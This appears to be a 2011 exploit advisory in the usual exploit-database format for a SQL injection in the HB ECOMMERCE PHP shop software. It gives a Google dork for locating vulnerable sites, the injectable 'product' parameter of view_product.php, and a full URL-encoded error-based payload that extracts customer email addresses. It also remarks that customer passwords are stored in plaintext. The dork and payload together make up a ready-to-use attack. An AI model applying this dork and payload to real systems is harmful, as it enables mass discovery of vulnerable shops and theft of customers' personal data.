39 lines
No EOL
1.7 KiB
Text
39 lines
No EOL
1.7 KiB
Text
-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
|
|
------------------------------------------------------------------------
|
|
------------------------------------------------------------------------
|
|
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
|
|
[+] Google Dork: intext:'supplied by hb ecommerce'
|
|
[+] Date: 26.05.2011
|
|
[+] Author: takeshix
|
|
[+] Author Contact: takeshix@safe-mail.net
|
|
[+] Software Link: http://www.hbecommerce.co.uk/
|
|
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
|
|
[+] System: PHP
|
|
------------------------------------------------------------------------
|
|
------------------------------------------------------------------------
|
|
vulnerable url:
|
|
|
|
/templates1/view_product.php?product=
|
|
|
|
Example:
|
|
|
|
http://localhost/templates1/view_product.php?product=[SQL INJECTION]
|
|
|
|
Get an Mail from the Customers Table:
|
|
|
|
http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
|
|
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
|
|
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
|
|
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
|
|
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
|
|
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
|
|
9a%29%20
|
|
|
|
note: customer passwords dumped in plaintext!
|
|
|
|
------------------------------------------------------------------------
|
|
------------------------------------------------------------------------
|
|
Greez to: esc0bar | Someone | takedown
|
|
------------------------------------------------------------------------
|
|
------------------------------------------------------------------------
|
|
--------------------------[ hacktivistas ]------------------------------ |